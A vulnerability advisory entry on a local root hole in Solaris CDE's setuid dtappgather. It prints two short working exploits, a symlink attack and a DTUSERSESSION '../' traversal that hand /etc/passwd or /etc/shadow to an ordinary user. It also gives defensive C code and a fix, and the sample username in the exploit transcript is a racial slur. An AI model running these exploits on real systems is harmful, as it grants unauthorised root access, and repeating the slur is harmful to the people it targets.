COMMAND

    /usr/dt/bin/dtappgather

SYSTEMS AFFECTED

    SunOS 5.5 & 5.5.1 running CDE version 1.0.2

PROBLEM

    Mastoras found the following.  Local users can change the ownership
    of any file, thus gaining root privileges.  This happens because
    "dtappgather" does not check whether the file

        /var/dt/appconfig/appmanager/generic-display-0

    is a symbolic link, and happily chown()s it to the user.  When CERT
    released advisory CA-98.02 (see CDE in the 'mUNIXes' section) about
    /usr/dt/bin/dtappgather, Mastoras played a little with dtappgather
    and discovered the problem above, but he thought that patch
    104498-02 corrected it, as described in Sun's section of CA-98.02.
    After applying the patch, it was still possible to gain root
    privileges.  The following exploit was initially posted to hack.gr's
    security mailing list, "haxor":

    nigg0r@host% ls -l /etc/passwd
    -r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
    nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
    nigg0r@host% dtappgather
    MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
    nigg0r@host% ls -l /etc/passwd
    -r-xr-xr-x   1 nigg0r   niggers      1585 Dec 17 22:26 /etc/passwd
    nigg0r@host% echo "nigg0r wins! Fatality!" | mail root

    It would have been easy to find the exploit if you had read CERT's
    advisory.  The following steps were enough:

    % cp /usr/dt/bin/dtappgather .          [you can't "truss" suid proggies]
    % truss -o koko ./dtappgather
    % more koko
    [ shity ld things ]
    chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
    chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
    [ shitty things ]

    J.A. Gutierrez added that the exploit is much simpler than that.
    Simply:

    $ id
    uid=6969(foo) gid=666(bar)
    $ ls -l /etc/shadow
    -r--------   1 root     sys          234 Nov  7  1999 /etc/shadow
    $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
    $ ls -l /etc/shadow
    -r-xr-xr-x   1 foo      bar          234 Nov  7  1999 /etc/shadow

    However, the first exploit works (at least on Solaris 2.5) even after
    patching CDE according to the CERT advisory.
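    Both variants above come down to one privileged operation done
    unsafely: chown()/chmod() on a path that an unprivileged user can
    point somewhere else, either by planting a symlink at the fixed name
    or by smuggling "../" through DTUSERSESSION.  The C below is an added
    example, not CDE's or Sun's code, showing how that step is done
    defensively: the session name is rejected unless it is a single path
    component, the directory is opened with O_NOFOLLOW | O_DIRECTORY so
    a symlink is refused (ELOOP), and the ownership and mode changes go
    through the descriptor (fchown/fchmod) rather than the path.  The
    function name safe_make_user_dir, the uid check on a pre-existing
    directory, and the scratch base directory used by main() are all
    assumptions for illustration.

```c
/* Added example (not CDE's code): a hardened version of the step that
 * dtappgather gets wrong.  Assumes a privileged program must create a
 * per-session directory under a base directory, hand it to the user and
 * set mode 0555, and that the session name is untrusted input such as
 * the DTUSERSESSION environment variable. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* A session name must be a single path component: no '/', not "." or
 * "..".  This blocks the DTUSERSESSION=../../../../etc/shadow trick. */
static int valid_session_name(const char *name)
{
    if (name == NULL || *name == '\0')
        return 0;
    if (strchr(name, '/') != NULL)
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    return 1;
}

/* Create base/session, give it to uid:gid and make it mode 0555 without
 * ever following a symbolic link planted at that path.  Returns 0 on
 * success, -1 with errno set on failure. */
int safe_make_user_dir(const char *base, const char *session,
                       uid_t uid, gid_t gid)
{
    char path[PATH_MAX];
    struct stat st;
    int fd, saved;

    if (!valid_session_name(session)) {
        errno = EINVAL;
        return -1;
    }
    if (snprintf(path, sizeof path, "%s/%s", base, session) >= (int)sizeof path) {
        errno = ENAMETOOLONG;
        return -1;
    }

    /* mkdir() does not follow a symlink in the last component, so a
     * planted link yields EEXIST here; the open() below still checks. */
    if (mkdir(path, 0555) != 0 && errno != EEXIST)
        return -1;

    /* O_NOFOLLOW refuses a symlink (ELOOP); O_DIRECTORY refuses anything
     * that is not a directory.  From here on only the descriptor is used,
     * so the path cannot be swapped out from underneath us. */
    fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return -1;

    if (fstat(fd, &st) != 0) {
        saved = errno; close(fd); errno = saved; return -1;
    }
    /* A pre-existing directory owned by a third user is not ours to give
     * away (assumed policy for this example). */
    if (st.st_uid != 0 && st.st_uid != uid) {
        close(fd); errno = EPERM; return -1;
    }
    if (fchown(fd, uid, gid) != 0 || fchmod(fd, 0555) != 0) {
        saved = errno; close(fd); errno = saved; return -1;
    }
    close(fd);
    return 0;
}

/* Stand-alone demo: create a scratch base directory and populate it for
 * the calling user, using the page's file name "generic-display-0". */
int main(void)
{
    char base[] = "/tmp/appmanagerXXXXXX";   /* constructed scratch path */
    if (mkdtemp(base) == NULL) { perror("mkdtemp"); return 1; }
    if (safe_make_user_dir(base, "generic-display-0", getuid(), getgid()) != 0) {
        perror("safe_make_user_dir"); return 1;
    }
    printf("created %s/generic-display-0 owned by uid %u\n",
           base, (unsigned)getuid());
    return 0;
}
```

    Run as an ordinary user the demo simply creates and keeps a directory
    under /tmp; the interesting behaviour is what the function refuses:
    a name containing "/" or ".." fails with EINVAL before the filesystem
    is touched, and a symlink at base/session fails at open() with ELOOP,
    so the file it points at is never chown()ed or chmod()ed.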

SOLUTION

    SunOS 5.6 (or CDE 1.2) ships the directory
    /var/dt/appconfig/appmanager/ with mode 755, so it is not possible
    to make the necessary link.  In SunOS 5.5* this directory has mode
    777, so any local user can easily make the link, or even unlink or
    rename the file "generic-display-0" if it exists and is owned by
    another user.  Quick fix (remove the setuid bit from dtappgather):

        chmod -s /usr/dt/bin/dtappgather